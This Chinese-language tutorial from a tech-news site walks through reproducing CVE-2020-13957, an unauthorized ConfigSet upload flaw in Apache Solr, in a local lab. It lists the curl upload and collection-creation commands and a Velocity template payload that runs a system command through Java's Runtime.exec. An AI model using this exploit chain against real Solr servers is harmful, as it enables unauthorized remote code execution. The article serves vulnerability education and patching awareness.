Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解

发布时间:2021-12-28 17:47:59 作者:柒染
来源:亿速云 阅读:144

本篇文章为大家展示了Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

0x00简介

Solr 是一个开源的企业级搜索服务器,底层使用易于扩展和修改的Java 来实现。服务器通信使用标准的HTTP 和XML,所以如果使用Solr 了解Java 技术会有用却不是必须的要求。

Solr 主要特性有:强大的全文检索功能,高亮显示检索结果,动态集群,数据库接口和电子文档(Word ,PDF 等)的处理。而且Solr 具有高度的可扩展,支持分布搜索和索引的复制。

0x01漏洞概述

Apache Solr 发布公告,旧版本的 ConfigSet API 中存在未授权上传漏洞风险,被利用可能导致 RCE(远程代码执行)。

0x02影响版本

Apache Solr 6.6.0 -6.6.5

Apache Solr 7.0.0 -7.7.3

Apache Solr 8.0.0 -8.6.2

0x03环境搭建

1.本次测试环境为solr7.0.1下载地址如下:

https://archive.apache.org/dist/lucene/solr/7.0.1/

Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解

2. 进入solr-7.7.0/bin目录下,使用 ./solr start -e cloud -force启动一个cloud示例,默认安装即可。

./solr start -e cloud -force

Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解

显示到这一步表示安装完成

Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解

在浏览器输入http://127.0.0.1:8983/

Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解

0x04漏洞利用

  1. 进入到/solr-7.0.1/server/solr/configsets/sample_techproducts_configs/conf 目录。

  2. 下修改solrconfig.xml如下内容:输入wq或x保存

原配置内容:

<queryResponseWriter name="velocity" class="solr.VelocityResponseWriter" startup="lazy">

<str name="template.base.dir">${velocity.template.base.dir:}</str>

</queryResponseWriter>

修改后:

<queryResponseWriter name="velocity" class="solr.VelocityResponseWriter" startup="lazy">

<str name="template.base.dir">${velocity.template.base.dir:}</str>

<str name="solr.resource.loader.enabled">${velocity.solr.resource.loader.enabled:true}</str>

<str name="params.resource.loader.enabled">${velocity.params.resource.loader.enabled:true}</str>

</queryResponseWriter>

Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解

3.然后执行zip -r - * > mytest.zip

Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解

Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解

4.然后接着执行curl -X POST --header "Content-Type:application/octet-stream" --data-binary @mytest.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mytest"

Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解

5. 然后接着执行curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=mytest2&numShards=1&replicationFactor=1&wt=xml&collection.configName=mytest"

Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解

6. 到这里可以看到已经上传上去名为mytest2的Collection。现在就可以使用漏洞执行RCE。

http://ip:8983/solr/mytest2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27pwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解

0x05修复建议

升级solr到最新版本

上述内容就是Apache Solr 未授权上传的漏洞CVE-2020-13957怎么理解,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注亿速云行业资讯频道。

推荐阅读:
  1. apache网站漏洞修复的解决办法是什么
  2. 如何进行Apache Solr DataImportHandler远程代码执行漏洞CVE-2019-0193分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

apache solr cve-2020-13957

上一篇:如何实现Netty的服务端Channel不支持写操作

下一篇:arduino中有用的函数有哪些

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》